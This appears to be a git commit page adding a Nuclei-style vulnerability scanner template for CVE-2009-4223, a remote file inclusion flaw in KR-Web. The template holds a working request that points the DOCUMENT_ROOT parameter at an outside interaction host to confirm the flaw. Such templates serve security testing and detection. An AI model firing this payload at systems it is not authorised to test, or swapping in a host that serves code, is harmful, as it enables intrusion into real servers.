Merge pull request #1894 from geeknik/patch-105

Create CVE-2009-4223.yaml
2021-07-07 18:35:27 +05:30 · 2021-07-07 18:35:27 +05:30 · 36a13094ef
parent 265bb75cd6 1fba6ae882
commit 36a13094ef
1 changed files with 26 additions and 0 deletions
--- a/cves/2009/CVE-2009-4223.yaml
+++ b/cves/2009/CVE-2009-4223.yaml
@ -0,0 +1,26 @@
+id: CVE-2009-4223
+
+info:
+  name: KR-Web <= 1.1b2 RFI
+  description: KR is a web content-server based on Apache-PHP-MySql technology who gives to internet programmers some PHP classes semplifying database content access. Elsewere, it gives some admin and user tools to write, hyerarchize and authorize contents.
+  reference:
+    - https://sourceforge.net/projects/krw/
+    - https://www.exploit-db.com/exploits/10216
+  author: geeknik
+  severity: high
+  tags: cve,cve2009,krweb,rfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/adm/krgourl.php?DOCUMENT_ROOT=http://{{interactsh-url}}"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"